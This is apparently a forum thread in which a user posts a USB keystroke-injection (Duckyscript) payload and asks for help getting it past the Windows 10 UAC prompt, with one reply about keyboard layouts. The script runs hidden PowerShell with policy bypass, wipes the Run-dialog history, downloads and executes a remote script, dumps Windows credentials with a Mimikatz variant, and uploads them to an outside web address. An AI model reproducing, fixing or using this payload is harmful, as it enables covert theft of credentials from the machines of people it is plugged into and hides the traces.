UAC Win 10 Help

below is my code that i piece together from other scripts including the Mr. Robot cred dump..... again i take no credit in this but i need help.

Win 10 machine with UAC enabled

When i run the script it doesnt get pass the UAC yes or no box .... any ideas

I have the ALT y command in there during testing so its not bot the ALT y or LEFTARROW

Thanks in advance

DELAY 1000

GUI r

DELAY 300

STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"

ENTER

DELAY 500

REM ALT y

LEFTARROW

DELAY 300

ENTER

DELAY 300

STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://www.mysite/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('http://www.mysite/rx.php', $o)"

ENTER

ALT y only works if you have a american keyboard/keyboad mapping because "yes" starts with a "y". For German it has to be ALT j it just depends on your language settings. have you tried doing it manually by hand and see if that works?

yes i did try manually.  What appears to happen that after the first string completes it opens the UAC dialog box but doesnt work after that.  I have to physically click the dialog box then press ALT y myself.....almost like the UAC box isnt the active window if that makes sense.  I thought maybe it was the delay that was the problem but i set it to 10000 and still woulldnt work.  I am using US keyboard